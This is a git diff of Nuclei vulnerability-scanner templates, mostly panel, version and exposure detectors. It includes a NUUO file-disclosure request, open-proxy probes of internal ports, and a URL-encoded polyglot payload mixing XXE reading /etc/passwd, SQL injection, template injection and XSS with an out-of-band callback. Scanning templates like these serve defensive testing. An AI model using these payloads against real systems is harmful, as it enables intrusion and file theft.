b0fbf4c1b1..0defb74c42 100644 --- a/poc/other/netflix-conductor-ui-9023.yaml +++ b/poc/other/netflix-conductor-ui-9023.yaml @@ -1,5 +1,4 @@ id: netflix-conductor-ui - info: name: Netflix Conductor UI Detection author: c-sh0 @@ -7,12 +6,10 @@ info: metadata: shodan-query: http.title:"Conductor UI", http.title:"Workflow UI" tags: webserver,netflix,conductor,panel - requests: - method: GET path: - "{{BaseURL}}" - redirects: true max-redirects: 2 matchers-condition: and @@ -20,10 +17,9 @@ requests: - type: status status: - 200 - - type: word part: body words: - 'Conductor UI' - 'Workflow UI' - condition: or \ No newline at end of file + condition: or diff --git a/poc/other/netflix-conductor-version-9024.yaml b/poc/other/netflix-conductor-version-9024.yaml index 3068408ccf..1f6ed207cd 100644 --- a/poc/other/netflix-conductor-version-9024.yaml +++ b/poc/other/netflix-conductor-version-9024.yaml @@ -2,18 +2,20 @@ id: netflix-conductor-version info: name: Netflix Conductor Version Detection author: c-sh0 + severity: info + description: Obtain netflix conductor version information reference: - https://github.com/Netflix/conductor/blob/v1.6.0-rc1/ui/src/server.js#L17 - https://github.com/Netflix/conductor/blob/v3.1.0/rest/src/main/java/com/netflix/conductor/rest/controllers/AdminResource.java#L42 - - /api/sys was removed >= v3.1.0 - severity: info - description: Obtain netflix conductor version information + metadata: + shodan-query: http.title:"Conductor UI", http.title:"Workflow UI" tags: tech,netflix,conductor,api requests: - method: GET path: - - "{{BaseURL}}/api/sys" - "{{BaseURL}}/api/admin/config" + - "{{BaseURL}}/api/sys" + stop-at-first-match: true matchers-condition: and matchers: - type: status @@ -25,13 +27,12 @@ requests: - 'application/json' - type: word part: body - case-insensitive: true words: - 'CONDUCTOR_' + case-insensitive: true extractors: - - type: json - json: - - '.sys.version' - - type: json - json: - - '.version' + - type: regex + group: 1 + regex: + - 'conductor\-server\-([0-9.]+)\-' + - '"version":"([0-9.]+)\-' diff --git a/poc/other/netis-router-9037.yaml b/poc/other/netis-router-9037.yaml index 9a13896cd2..8e30e94cb0 100644 --- a/poc/other/netis-router-9037.yaml +++ b/poc/other/netis-router-9037.yaml @@ -1,5 +1,4 @@ id: netis-router - info: name: Netis Router Login author: gy741 @@ -7,24 +6,20 @@ info: reference: - https://www.tacnetsol.com/blog/cve-2019-8985-rce tags: panel,login,netis,router - requests: - method: GET path: - '{{BaseURL}}/login.htm' - matchers-condition: and matchers: - type: word part: body words: - 'AP setup' - - type: word part: header words: - 'Server: netis' - - type: status status: - 200 diff --git a/poc/other/nifi-detech-9131.yaml b/poc/other/nifi-detech-9131.yaml index c186872e68..725823f16e 100644 --- a/poc/other/nifi-detech-9131.yaml +++ b/poc/other/nifi-detech-9131.yaml @@ -1,9 +1,11 @@ id: apache-nifi-detect + info: name: Apache NiFi detect author: dwisiswant0 severity: info tags: tech,apache,nifi + requests: - method: GET path: @@ -14,6 +16,7 @@ requests: - "{{BaseURL}}/flow/registries" - "{{BaseURL}}/system-diagnostics" - "{{BaseURL}}/nifi-api/access/config" + stop-at-first-match: true matchers-condition: and matchers: @@ -24,6 +27,7 @@ requests: - "disconnectedNodeAcknowledged" - "(aggregate|node)Snapshots?" condition: or + - type: status status: - 200 diff --git a/poc/other/ntlm-directories-9157.yaml b/poc/other/ntlm-directories-9157.yaml index cd6487fc24..4fe065a1c8 100644 --- a/poc/other/ntlm-directories-9157.yaml +++ b/poc/other/ntlm-directories-9157.yaml @@ -3,7 +3,6 @@ info: name: Discovering directories w/ NTLM author: puzzlepeaches severity: info - tags: misc requests: - method: GET path: @@ -51,14 +50,8 @@ requests: - "{{BaseURL}}/webticket/" - "{{BaseURL}}/webticket/webticketservice.svc" - "{{BaseURL}}/webticket/webticketservice.svcabs/" - matchers-condition: and matchers: - type: word words: - - "WWW-Authenticate: NTLM" - - "Www-Authenticate: NTLM" + - "Www-Authenticate" part: header - condition: or - - type: status - status: - - 401 diff --git a/poc/other/nuuo-file-inclusion-9169.yaml b/poc/other/nuuo-file-inclusion-9169.yaml index 2a29674630..f577991d4f 100644 --- a/poc/other/nuuo-file-inclusion-9169.yaml +++ b/poc/other/nuuo-file-inclusion-9169.yaml @@ -1,24 +1,30 @@ id: nuuo-file-inclusion + info: - name: NUUO NVRmini 2 3.0.8 Local File Disclosure + name: NUUO NVRmini 2 v3.0.8 - Atrbitary File Retrieval author: princechaddha severity: high - reference: https://www.exploit-db.com/exploits/40211 + reference: + - https://www.exploit-db.com/exploits/40211 tags: nuuo,lfi + requests: - method: GET path: - "{{BaseURL}}/css_parser.php?css=css_parser.php" + matchers-condition: and matchers: - type: word part: body words: - "$_GET['css']" + - type: word part: header words: - "text/css" + - type: status status: - 200 diff --git a/poc/other/officedocuments.yaml b/poc/other/officedocuments.yaml index 7d7ee1dc9b..1bfe5b366c 100644 --- a/poc/other/officedocuments.yaml +++ b/poc/other/officedocuments.yaml @@ -1,27 +1,24 @@ -id: extract-office-documents-links - -info: - name: Office Documents links extractor - author: cipher387 - severity: info - description: Extract Office Documents links from web page body - tags: osint,juicy-info - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: regex - part: body - regex: - - '(?:https?|ftp)://\S+\.(docx?|xlsx?|pptx?|msg|accdb|mdb|pub|rtf|csv|odt|ods|odp)' - extractors: - - type: regex - part: body - regex: - - '(?:https?|ftp)://\S+\.(docx?|xlsx?|pptx?|msg|accdb|mdb|pub|rtf|csv|odt|ods|odp)' - - -#url for testhttps://www.luxembourg-city.com/en/things-to-do/sights/museums?gclid=CjwKCAiAmJGgBhAZEiwA1JZoluBJdgHKvXv5oCSZRsI8Gnse7rX_pWk-yqD5d7ca8-9Z8rij1ledfhoCm5EQAvD_BwE +id: extract-office-documents-links + +info: + name: Office Documents links extractor + author: pdteam + severity: info + description: Extract Office Documents links from web page body + + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: regex + part: body + regex: + - '(?:https?|ftp)://\S+\.(xlsx?|csv|pptx?|msg|rtf|pub|rtf|mdb|odp|ods|odt|doc|xls)' + extractors: + - type: regex + part: body + regex: + - '(?:https?|ftp)://\S+\.(xlsx?|csv|pptx?|msg|rtf|pub|rtf|mdb|odp|ods|odt|doc|xls)' diff --git a/poc/other/okiko-sfiler-portal-9227.yaml b/poc/other/okiko-sfiler-portal-9227.yaml index 966dae495b..b74089478f 100644 --- a/poc/other/okiko-sfiler-portal-9227.yaml +++ b/poc/other/okiko-sfiler-portal-9227.yaml @@ -4,8 +4,8 @@ info: name: OKIKO S-Filer Portal Detect author: johnk3r severity: info - reference: - - https://www.shodan.io/search?query=sfiler + metadata: + shodan-query: http.title:"S-Filer" tags: okiko,panel requests: diff --git a/poc/other/old-copyright-9238.yaml b/poc/other/old-copyright-9238.yaml index 75f00c2eed..a1cdb7e7e1 100644 --- a/poc/other/old-copyright-9238.yaml +++ b/poc/other/old-copyright-9238.yaml @@ -1,26 +1,22 @@ id: old-copyright - info: name: Find pages with old copyright dates author: geeknik severity: info tags: misc - requests: - method: GET path: - "{{BaseURL}}" - redirects: true max-redirects: 3 matchers-condition: and matchers: - type: word words: - - '2022' + - '2021' part: body negative: true - - type: regex part: body regex: diff --git a/poc/other/onliner-multiple-bugs.yaml b/poc/other/onliner-multiple-bugs.yaml index 4bd1c21ee5..a3b054a876 100644 --- a/poc/other/onliner-multiple-bugs.yaml +++ b/poc/other/onliner-multiple-bugs.yaml @@ -1,30 +1,26 @@ -id: one_line_checks_nuclei - -info: - name: one_line_checks_nuclei - author: brinhosa - severity: medium - description: Check for multiple vulnerabilities in one payload. - reference: - - https://github.com/brinhosa/payloads - tags: xss,sqli,xxe,ssti,csti - - -http: - - - method: GET - path: - - '{{BaseURL}}/?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%20%3F%3E%3C%21--%20%27or%201%3D1--%3E%3C%21--%20%22%3E%3C%25%3D71%2A71%25%3E%7B%7B71%2A71%7D%7D%20--%3E%3C%21DOCTYPE%0Atest%20%5B%20%3C%21ENTITY%20x%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3CstockCheck%3E%3CproductId%3E%26x%3B%3C%2FproductId%3E%3CstoreId%3E1%3C%2FstoreId%3E%3C%21%5BCDATA%5B%3Cs%3E%3Csvg%2Fonload%3Dprompt%285%29%3B%3E%26url%3Dhttps%3A%2F%2F%7B%7Binteractsh-url%7D%7D%26b%3D%5D%5D%3E%3C%2FstockCheck%3E' - - '{{BaseURL}}/%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%20%3F%3E%3C%21--%20%27or%201%3D1--%3E%3C%21--%20%22%3E%3C%25%3D71%2A71%25%3E%7B%7B71%2A71%7D%7D%20--%3E%3C%21DOCTYPE%0Atest%20%5B%20%3C%21ENTITY%20x%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3CstockCheck%3E%3CproductId%3E%26x%3B%3C%2FproductId%3E%3CstoreId%3E1%3C%2FstoreId%3E%3C%21%5BCDATA%5B%3Cs%3E%3Csvg%2Fonload%3Dprompt%285%29%3B%3E%26url%3Dhttps%3A%2F%2F%7B%7Binteractsh-url%7D%7D%26b%3D%5D%5D%3E%3C%2FstockCheck%3E%0A' - skip-variables-check: true - matchers: - - type: word - part: body - words: - - "" - - "www-data:" - - "daemon:" - - "user:x" - - "5041" - - "mysql" - condition: or +id: one_line_checks_nuclei +info: + name: one_line_checks_nuclei + author: brinhosa + severity: medium + description: Check for multiple vulnerabilities in one payload. + reference: + - https://github.com/brinhosa/payloads + tags: xss,sqli,xxe,ssti,csti +requests: + - method: GET + path: + - '{{BaseURL}}/?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%20%3F%3E%3C%21--%20%27or%201%3D1--%3E%3C%21--%20%22%3E%3C%25%3D71%2A71%25%3E%7B%7B71%2A71%7D%7D%20--%3E%3C%21DOCTYPE%0Atest%20%5B%20%3C%21ENTITY%20x%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3CstockCheck%3E%3CproductId%3E%26x%3B%3C%2FproductId%3E%3CstoreId%3E1%3C%2FstoreId%3E%3C%21%5BCDATA%5B%3Cs%3E%3Csvg%2Fonload%3Dprompt%285%29%3B%3E%26url%3Dhttps%3A%2F%2F%7B%7Binteractsh-url%7D%7D%26b%3D%5D%5D%3E%3C%2FstockCheck%3E' + - '{{BaseURL}}/%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%20%3F%3E%3C%21--%20%27or%201%3D1--%3E%3C%21--%20%22%3E%3C%25%3D71%2A71%25%3E%7B%7B71%2A71%7D%7D%20--%3E%3C%21DOCTYPE%0Atest%20%5B%20%3C%21ENTITY%20x%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3CstockCheck%3E%3CproductId%3E%26x%3B%3C%2FproductId%3E%3CstoreId%3E1%3C%2FstoreId%3E%3C%21%5BCDATA%5B%3Cs%3E%3Csvg%2Fonload%3Dprompt%285%29%3B%3E%26url%3Dhttps%3A%2F%2F%7B%7Binteractsh-url%7D%7D%26b%3D%5D%5D%3E%3C%2FstockCheck%3E%0A' + skip-variables-check: true + matchers: + - type: word + part: body + words: + - "" + - "www-data:" + - "daemon:" + - "user:x" + - "5041" + - "mysql" + condition: or diff --git a/poc/other/open-mjpg-streamer-9284.yaml b/poc/other/open-mjpg-streamer-9284.yaml index 07826b437c..a00ea8360c 100644 --- a/poc/other/open-mjpg-streamer-9284.yaml +++ b/poc/other/open-mjpg-streamer-9284.yaml @@ -1,18 +1,16 @@ id: open-mjpg-streamer - info: name: open-mjpg-streamer author: gboddin severity: medium - reference: https://github.com/jacksonliam/mjpg-streamer - tags: iot,webcam description: Open mjpg-streamer service sharing webcam/camera feed - + reference: + - https://github.com/jacksonliam/mjpg-streamer + tags: iot,webcam requests: - method: GET path: - "{{BaseURL}}/?action=stream" - max-size: 2048 matchers-condition: and matchers: @@ -20,7 +18,6 @@ requests: words: - 'MJPG-Streamer/0.2' part: header - - type: status status: - 200 diff --git a/poc/other/open-proxy-internal-9289.yaml b/poc/other/open-proxy-internal-9289.yaml index ece86d0f4b..0a243ff19a 100644 --- a/poc/other/open-proxy-internal-9289.yaml +++ b/poc/other/open-proxy-internal-9289.yaml @@ -3,7 +3,9 @@ info: name: Open Proxy To Internal Network author: sullo severity: high + tags: exposure,config,proxy,misconfig,fuzz description: The host is configured as a proxy which allows access to other hosts on the internal network. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. reference: - https://blog.projectdiscovery.io/abusing-reverse-proxies-internal-access/ - https://en.wikipedia.org/wiki/Open_proxy @@ -12,8 +14,6 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-441 - remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. - tags: exposure,config,proxy,misconfig,fuzz requests: - raw: - | @@ -107,5 +107,4 @@ requests: - (!contains(body_1, "ssh")) && (contains(body_2, "ssh") || contains(body_3, "ssh")) || contains(body_4, "ssh") || contains(body_5, "ssh") || contains(body_6, "ssh") || contains(body_7, "ssh") || contains(body_8, "ssh") || contains(body_9, "ssh") || contains(body_10, "ssh") || contains(body_11, "ssh") || contains(body_12, "ssh") || contains(body_13, "ssh") || contains(body_14, "ssh") || contains(body_15, "ssh") || contains(body_16, "ssh") || contains(body_17, "ssh") || contains(body_18, "ssh") || contains(body_19, "ssh") || contains(body_20, "ssh") || contains(body_21, "ssh") || contains(body_22, "ssh") || contains(body_23, "ssh") || contains(body_24, "ssh") - (!contains(body_1, "SSH")) && (contains(body_2, "SSH") || contains(body_3, "SSH")) || contains(body_4, "SSH") || contains(body_5, "SSH") || contains(body_6, "SSH") || contains(body_7, "SSH") || contains(body_8, "SSH") || contains(body_9, "SSH") || contains(body_10, "SSH") || contains(body_11, "SSH") || contains(body_12, "SSH") || contains(body_13, "SSH") || contains(body_14, "SSH") || contains(body_15, "SSH") || contains(body_16, "SSH") || contains(body_17, "SSH") || contains(body_18, "SSH") || contains(body_19, "SSH") || contains(body_20, "SSH") || contains(body_21, "SSH") || contains(body_22, "SSH") || contains(body_23, "SSH") condition: or - -# Enhanced by mp on 2022/04/21 +# Enhanced by cs on 2022/02/14 diff --git a/poc/other/open-proxy-localhost-9292.yaml b/poc/other/open-proxy-localhost-9292.yaml index ac9f81f463..7fe8f1e90a 100644 --- a/poc/other/open-proxy-localhost-9292.yaml +++ b/poc/other/open-proxy-localhost-9292.yaml @@ -1,9 +1,12 @@ id: open-proxy-http-portscan + info: - name: Open Proxy to Other Web Ports via Proxy's localhost Interface + name: Open Proxy to Other Web Ports on Proxy's localhost Interface author: sullo severity: high + tags: exposure,config,proxy,misconfig,fuzz description: The host is configured as a proxy which allows access to web ports on the host's internal interface. + remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. reference: - https://blog.projectdiscovery.io/abusing-reverse-proxies-internal-access/ - https://en.wikipedia.org/wiki/Open_proxy @@ -12,8 +15,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-441 - remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. - tags: exposure,config,proxy,misconfig,fuzz + requests: - raw: - |+ @@ -57,5 +59,3 @@ requests: - (!contains(body_1, "Welcome to Windows") && !contains(body_2, "Welcome to Windows")) && (contains(body_3, "Welcome to Windows") || contains(body_4, "Welcome to Windows") || contains(body_5, "Welcome to Windows") || contains(body_6, "Welcome to Windows")) - (!contains(body_1, "Welcome to Windows") && !contains(body_2, "Welcome to Windows")) && (contains(body_3, "Welcome to Windows") || contains(body_4, "Welcome to Windows") || contains(body_5, "Welcome to Windows") || contains(body_6, "Welcome to Windows")) - (!contains(body_1, "It works") && !contains(body_2, "It works")) && (contains(body_3, "It works") || contains(body_4, "It works") || contains(body_5, "It works") || contains(body_6, "It works")) - -# Enhanced by mp on 2022/04/21 diff --git a/poc/other/open-proxy-portscan-9294.yaml b/poc/other/open-proxy-portscan-9294.yaml index 2939d5d9af..387bf7f087 100644 --- a/poc/other/open-proxy-portscan-9294.yaml +++ b/poc/other/open-proxy-portscan-9294.yaml @@ -1,12 +1,9 @@ id: open-proxy-portscan - info: name: Open Proxy to Ports on the Proxy's localhost Interface author: sullo severity: high - tags: exposure,config,proxy,misconfig,fuzz description: The host is configured as a proxy which allows access to its internal interface - remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. reference: - https://blog.projectdiscovery.io/abusing-reverse-proxies-internal-access/ - https://en.wikipedia.org/wiki/Open_proxy @@ -15,7 +12,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-441 - + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. + tags: exposure,config,proxy,misconfig,fuzz requests: - raw: - |+ @@ -61,4 +59,4 @@ requests: - (!regex("(?i)POP3",body_1)) && (!regex("(?i)POP3",body_2)) && (regex("(?i)POP3",body_6)) - (!regex("(?i)SMTP",body_1)) && (!regex("(?i)SMTP",body_2)) && ((regex("(?i)SMTP",body_5)) || (regex("(?i)SMTP",body_7)) || (regex("(?i)SMTP",body_8))) -# Updated by Chris on 2022/01/21 +# Enhanced by cs on 2022/01/21 diff --git a/poc/other/open-virtualization-manager-panel-9327.yaml b/poc/other/open-virtualization-manager-panel-9327.yaml index 8c610b8ae9..cc81a65f2c 100644 --- a/poc/other/open-virtualization-manager-panel-9327.yaml +++ b/poc/other/open-virtualization-manager-panel-9327.yaml @@ -1,21 +1,29 @@ id: open-virtualization-manager-panel + info: - name: Open Virtualization Userportal & Webadmin Panel + name: Open Virtualization Userportal & Webadmin Panel Detection author: idealphase severity: info - description: open-source distributed virtualization solution, designed to manage your entire enterprise infrastructure. oVirt uses the trusted KVM hypervisor and is built upon several other community projects, including libvirt, Gluster, PatternFly, and Ansible. - metadata: - shodan-query: title:"Ovirt-Engine" - google-query: intitle:"Ovirt-Engine" + description: Open Virtualization Userportal & Webadmin panels were detected. Open Virtualization Manager is an open-source distributed virtualization solution designed to manage enterprise infrastructure. oVirt + uses the trusted KVM hypervisor and is built upon several other community projects, including libvirt, Gluster, PatternFly, and Ansible. reference: - https://www.ovirt.org/ - https://www.ovirt.org/dropped/admin-guide/virt/console-client-resources.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 + metadata: + shodan-query: title:"Ovirt-Engine" + google-query: intitle:"Ovirt-Engine" tags: panel,ovirt,oss + requests: - method: GET path: - '{{BaseURL}}/ovirt-engine/userportal/' - '{{BaseURL}}/ovirt-engine/webadmin/' + matchers-condition: and matchers: - type: word @@ -23,11 +31,15 @@ requests: - '"application_title":"oVirt Engine User Portal"' - '"application_title":"oVirt Engine Web Administration"' condition: or + - type: status status: - 200 + extractors: - type: regex group: 1 regex: - '"application_title":"(([a-zA-Z]+\s)*[a-zA-Z]+)"' + +# Enhanced by mp on 2022/04/08 diff --git a/poc/other/otobo-panel-9412.yaml b/poc/other/otobo-panel-9412.yaml index 64bc70baab..bc3f8054fc 100644 --- a/poc/other/otobo-panel-9412.yaml +++ b/poc/other/otobo-panel-9412.yaml @@ -5,7 +5,8 @@ info: author: princechaddha severity: info description: OTOBO is one of the most flexible web-based ticketing systems used for Customer Service, Help Desk, IT Service Management. - reference: https://github.com/rotheross/otobo + reference: + - https://github.com/rotheross/otobo metadata: shodan-query: http.title:"otobo" tags: panel,otobo diff --git a/poc/other/pacs-connexion-utilisateur-9426.yaml b/poc/other/pacs-connexion-utilisateur-9426.yaml index 4f7558b184..f71e39ac2e 100644 --- a/poc/other/pacs-connexion-utilisateur-9426.yaml +++ b/poc/other/pacs-connexion-utilisateur-9426.yaml @@ -4,8 +4,8 @@ info: name: GXD5 Pacs Connexion utilisateur author: dhiyaneshDK severity: info - metadata: - shodan-query: http.title:"GXD5 Pacs Connexion utilisateur" + reference: + - https://www.shodan.io/search?query=http.title%3A%22GXD5+Pacs+Connexion+utilisateur%22 tags: panel,login requests: diff --git a/poc/other/paid-memberships-pro-2f1f722497a030b6c22a2e032c49f1c0.yaml b/poc/other/paid-memberships-pro-2f1f722497a030b6c22a2e032c49f1c0.yaml new file mode 100644 index 0000000000..5328bd74c5 --- /dev/null +++ b/poc/other/paid-memberships-pro-2f1f722497a030b6c22a2e032c49f1c0.yaml @@ -0,0 +1,59 @@ +id: paid-memberships-pro-2f1f722497a030b6c22a2e032c49f1c0 + +info: + name: > + Paid Memberships Pro <= 3.0.5 - Authenticated (Administrator+) SQL Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/682a7439-d10a-48b7-84c5-60ac00cf7879?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/paid-memberships-pro/" + google-query: inurl:"/wp-content/plugins/paid-memberships-pro/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,paid-memberships-pro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/paid-memberships-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "paid-memberships-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.0.5') \ No newline at end of file diff --git a/poc/other/panasonic-network-management-9449.yaml b/poc/other/panasonic-network-management-9449.yaml index 198c36edb7..4ddf52748f 100644 --- a/poc/other/panasonic-network-management-9449.yaml +++ b/poc/other/panasonic-network-management-9449.yaml @@ -4,7 +4,7 @@ info: author: dhiyaneshDk severity: medium reference: https://www.exploit-db.com/ghdb/6487 - tags: iot + tags: iot,camera,panasonic requests: - method: GET path: diff --git a/poc/other/payflex-payment-gateway.yaml b/poc/other/payflex-payment-gateway.yaml new file mode 100644 index 0000000000..3e0a3fb7aa --- /dev/null +++ b/poc/other/payflex-payment-gateway.yaml @@ -0,0 +1,59 @@ +id: payflex-payment-gateway + +info: + name: > + Payflex Payment Gateway <= 2.5.0 - Missing Authorization to Order Status Update + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9f740cfa-7163-4634-9705-0e01ee571a11?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/payflex-payment-gateway/" + google-query: inurl:"/wp-content/plugins/payflex-payment-gateway/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,payflex-payment-gateway,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/payflex-payment-gateway/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "payflex-payment-gateway" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.0') \ No newline at end of file diff --git a/poc/other/plesk-obsidian-9597.yaml b/poc/other/plesk-obsidian-9597.yaml index ee15fd8a20..9fdeccf21f 100644 --- a/poc/other/plesk-obsidian-9597.yaml +++ b/poc/other/plesk-obsidian-9597.yaml @@ -4,7 +4,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6951 - tags: panel + tags: panel,plesk requests: - method: GET path: @@ -17,3 +17,8 @@ requests: - type: status status: - 200 + extractors: + - type: regex + group: 1 + regex: + - '(?i)([A-Za-z 0-9.]+)' diff --git a/poc/other/plesk-onyx-9601.yaml b/poc/other/plesk-onyx-9601.yaml index fdd918af75..6cb3338a39 100644 --- a/poc/other/plesk-onyx-9601.yaml +++ b/poc/other/plesk-onyx-9601.yaml @@ -1,19 +1,52 @@ id: plesk-onyx-login + info: - name: Plesk Onyx login portal - author: dhiyaneshDK + name: Plesk Login Panel - Detect + author: dhiyaneshDK,daffainfo,righettod severity: info - reference: https://www.exploit-db.com/ghdb/6501 - tags: panel,plesk,login -requests: + description: Plesk login panel was detected. + reference: + - https://www.exploit-db.com/ghdb/6501 + - https://www.plesk.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + cpe: cpe:2.3:a:plesk:onyx:*:*:*:*:*:*:*:* + metadata: + google-query: inurl:login_up.php "Plesk Onyx" + max-request: 1 + product: onyx + shodan-query: http.html:"Plesk Onyx" http.html:"plesk-build" + vendor: plesk + verified: true + tags: panel,plesk,login,edb + +http: - method: GET path: - '{{BaseURL}}/login_up.php' + matchers-condition: and matchers: - type: word + part: body words: - - 'Plesk Onyx' + - 'alt="Plesk Onyx' + - 'plesk-build' + - 'plesk-revision' + - 'plesk-root' + condition: or + case-insensitive: true + - type: status status: - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'alt="Plesk Onyx ([0-9.]+)"' + - '(?i)"urlArgs":"([0-9.-]+)"' +# digest: 4b0a00483046022100a73e9210a77569c000bbcea05644a89af56d790ac62ddf770972f5475494b2d10221009bcdc08d5f05bfab0069e23a682ee72d471ae8c653245fb7cf245ae44b624523:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/plesk-stat-9603.yaml b/poc/other/plesk-stat-9603.yaml index c8ee34a5c4..5f0400beed 100644 --- a/poc/other/plesk-stat-9603.yaml +++ b/poc/other/plesk-stat-9603.yaml @@ -1,4 +1,5 @@ id: plesk-stat + info: name: Plesk-stat (Log analyzer) author: th3.d1p4k @@ -6,20 +7,24 @@ info: reference: - http://www.webalizer.org tags: config,exposure,plesk + requests: - method: GET path: - "{{BaseURL}}/plesk-stat/" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - 'Index of /plesk-stat' - 'Parent Directory' condition: and + - type: word words: - 'anon_ftpstat' diff --git a/poc/other/portainer-init-deploy-9631.yaml b/poc/other/portainer-init-deploy-9631.yaml index db1f4fd4b3..8e01787f93 100644 --- a/poc/other/portainer-init-deploy-9631.yaml +++ b/poc/other/portainer-init-deploy-9631.yaml @@ -1,4 +1,5 @@ id: portainer-init-deploy + info: name: Portainer Init Deploy author: princechaddha @@ -6,19 +7,23 @@ info: reference: - https://documentation.portainer.io/v2.0/deploy/initial/ tags: portainer,exposure,docker,devops,panel + requests: - method: GET path: - "{{BaseURL}}/api/users/admin/check" + matchers-condition: and matchers: - type: word words: - "No administrator account found inside the database" + - type: word words: - "application/json" part: header + - type: status status: - 404 diff --git a/poc/other/posterity.yaml b/poc/other/posterity.yaml new file mode 100644 index 0000000000..f4595eb420 --- /dev/null +++ b/poc/other/posterity.yaml @@ -0,0 +1,59 @@ +id: posterity + +info: + name: > + Posterity <= 3.3 - Cross-Site Request Forgery to Notice Dismissal + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1b2b49af-1bed-4c81-95c2-f8b80c06a829?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/posterity/" + google-query: inurl:"/wp-content/themes/posterity/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,posterity,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/posterity/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "posterity" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3') \ No newline at end of file diff --git a/poc/other/postmessage-tracker-9638.yaml b/poc/other/postmessage-tracker-9638.yaml index d0a1e79480..a091ac8494 100644 --- a/poc/other/postmessage-tracker-9638.yaml +++ b/poc/other/postmessage-tracker-9638.yaml @@ -4,8 +4,7 @@ info: name: Postmessage Tracker author: pdteam severity: info - reference: - - https://github.com/vinothsparrow/iframe-broker/blob/main/static/script.js + reference: https://github.com/vinothsparrow/iframe-broker/blob/main/static/script.js tags: headless,postmessage headless: diff --git a/poc/other/powerlogic-ion-9648.yaml b/poc/other/powerlogic-ion-9648.yaml index 4f5ae8d7fd..a2dc55dd44 100644 --- a/poc/other/powerlogic-ion-9648.yaml +++ b/poc/other/powerlogic-ion-9648.yaml @@ -1,17 +1,15 @@ id: powerlogic-ion - info: name: PowerLogic ION Exposed author: dhiyaneshDK severity: low - reference: https://www.exploit-db.com/ghdb/6810 + reference: + - https://www.exploit-db.com/ghdb/6810 tags: panel - requests: - method: GET path: - '{{BaseURL}}' - matchers-condition: and matchers: - type: word diff --git a/poc/other/premium-addons-for-elementor-6304eb6368ed9f8217294c91faa22c83.yaml b/poc/other/premium-addons-for-elementor-6304eb6368ed9f8217294c91faa22c83.yaml new file mode 100644 index 0000000000..cd22feeb88 --- /dev/null +++ 